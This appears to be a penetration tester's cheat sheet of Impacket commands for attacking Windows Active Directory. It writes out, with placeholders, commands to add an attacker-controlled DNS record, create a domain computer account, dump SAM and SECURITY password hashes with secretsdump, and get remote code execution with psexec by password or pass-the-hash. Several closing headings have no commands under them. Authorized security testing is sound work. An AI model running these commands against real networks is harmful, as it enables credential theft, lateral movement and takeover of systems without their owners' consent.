Impacket
A collection of useful Impacket commands commonly used in engagements.
Add DNS record
# Clone the following repo first: https://github.com/dirkjanm/krbrelayx/tree/master
python3 dnstool.py -u <domain\username> -p <password> -a add -r <ns-record> -d <attacker-ip> <dc-ip>
# Check if NS record has been added
python3 dnstool.py -u <domain\username> -p <password> -a query -r <ns-record> -d <attacker-ip> <dc-ip>
Add computer account
impacket-addcomputer -dc-ip <DC-IP> -computer-name <COMPUTER-NAME>$ -computer-pass '<PASSWORD>' '<DOMAIN-FQDN>/<USERNAME>:<PASSWORD>'
Dump local hashes with secretsdump
# Dump SAM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Dump SECURITY
impacket-secretsdump -security SECURITY -system SYSTEM LOCAL
RCE with psexec
# With a password
impacket-psexec <domain>/<username>:'<password>'@<target>
# With a hash
impacket-psexec <domain>/<username>@<target> -hashes <ntlm>:<ntlm>
SMBclient
MSSQLclient
Get a list of all AD users
Dump SAM and SYSTEM using registry
Enumerate Group Policy passwords